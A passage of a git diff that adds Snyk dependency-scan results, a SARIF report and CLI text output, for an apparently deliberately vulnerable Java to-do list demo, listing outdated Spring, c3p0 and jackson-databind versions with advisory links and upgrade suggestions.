"SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-expression package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-expression@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.0.0.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.0.0.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-expression package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-expression@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.0.0.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.0.0.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-beans package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-beans@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.2.22.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.2.22.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "level": "note", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-context package with a low severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-context@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.0.0.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.0.0.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGZEROTURNAROUND-31681", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.zeroturnaround:zt-zip package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.zeroturnaround:zt-zip@1.12" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.zeroturnaround:zt-zip@1.13" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.zeroturnaround:zt-zip@1.13" + } + } + ] + } + ] + } + ] + } + ] + } + ] +} diff --git a/todolist-goof/todolist-web-struts/test.text b/todolist-goof/todolist-web-struts/test.text new file mode 100644 index 0000000000..3e69986d8c --- /dev/null +++ b/todolist-goof/todolist-web-struts/test.text 
@@ -0,0 +1,799 @@ + +Testing snyk-filter-1.3.2... +✗ High severity vulnerability found on c3p0:c3p0@0.9.1.2 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-C3P0-461018 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > io.github.snyk:todolist-core@0.0.1-SNAPSHOT > c3p0:c3p0@0.9.1.2 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: XML External Entity (XXE) Injection +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- 
info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > 
io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability 
found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-174736 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ Medium severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Denial of Service (DoS) +- info: 
https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ Medium severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Denial of Service (DoS) +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > 
io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ Medium severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-450917 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found 
on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: 
https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > 
io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found 
on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: 
https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > 
io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450 +- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT > com.fasterxml.jackson.core:jackson-databind@2.6.5 + + +✗ High severity vulnerability found on com.fasterxml.jackson.core:jackson-databind@2.6.5 +- desc: Deserialization of Untrusted Data +- info: https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451 